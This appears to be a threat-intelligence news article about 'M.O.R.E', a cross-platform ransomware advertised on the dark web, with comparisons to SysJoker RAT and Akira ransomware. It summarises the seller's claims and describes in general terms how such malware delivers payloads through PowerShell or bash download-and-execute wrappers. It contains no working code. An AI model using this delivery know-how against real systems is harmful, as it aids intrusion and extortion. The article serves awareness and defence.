A new threat has recently emerged on the dark web, which has potential victims across multiple operating systems worried. This new threat, named M.O.R.E (Multi OS Ransomware Executable), has been creating a buzz due to its native compatibility with various operating systems, including Windows, Mac OS, and Linux. The actor behind this multi-OS ransomware claims it to be a game-changer for hacker groups.
According to the seller’s post, which was timestamped at 02:49 AM on Wednesday, February 14, 2024, M.O.R.E offers swift encryption using advanced algorithms like RSA/Chacha20Poly1305. It can crawl through systems and encrypt or decrypt hefty 1024 MB files in a mere 4 seconds. The dynamic multi-threading feature ensures efficient performance across a spectrum of machines, from low-end to high-end systems.
The code snippet provided in the post appears to be a PowerShell script, showcasing its capability to interact with files. However, the content displayed seems to be a jumble of characters and symbols, hinting at possible encryption or corruption. While the exact function of this script remains unclear, it highlights the potential threat posed by M.O.R.E.
This multi-OS ransomware represents an evolution in cyber threats. Unlike traditional ransomware that targets specific operating systems, this new breed can infiltrate and encrypt files across different platforms simultaneously. This capability opens up avenues for cybercriminals to unleash widespread chaos and demand hefty ransoms from victims.
One recent example of multi-OS malware is the SysJoker RAT, as highlighted in a VMware report from the previous year. SysJoker RAT, designed to target Windows, Linux, and macOS, demonstrates the potency of cross-platform malware. By leveraging shared code across multiple platforms, attackers can execute commands remotely and deploy additional malicious payloads with ease.
Moreover, last year, India’s nodal agency for computer security-related threats issued a warning to citizens and organizations regarding the emergence of Akira ransomware, a cross-OS threat targeting organizations around the globe. The Union government’s Computer Emergency Response Team-India (CERT-In) issued the critical advisory, stating that the ransomware targeted both Windows and Linux-based operating systems.
The agency informed that the group responsible for the ransomware compromised users via VPN services, particularly when multi-factor authentication wasn’t enabled. Additionally, they deceived users through tools such as AnyDesk, WinRAR, and PC Hunter, to download benign-looking files.
Similarly, other malware, RATs, and ransomware can infect multiple operating systems, although they typically target a specific one known to have vulnerabilities. It accomplishes this by detecting the OS first and then deploying its payload through various wrappers such as PowerShell or Linux bash scripts. These scripts download the malware into temporary storage and execute it. Additionally, the prevalence of Python or Java installations across systems provides a universal medium for malware interpretation and execution.
In conclusion, the emergence of M.O.R.E as a multi-OS ransomware tool has raised concerns in the cybersecurity community. Its capability to target multiple operating systems simultaneously represents a significant advancement in the evolving landscape of cyber threats. Organizations and individuals are advised to remain vigilant and take proactive measures to secure their systems against such threats. With the dark web continually evolving, it is imperative for cybersecurity experts to stay one step ahead in protecting against these new and emerging threats.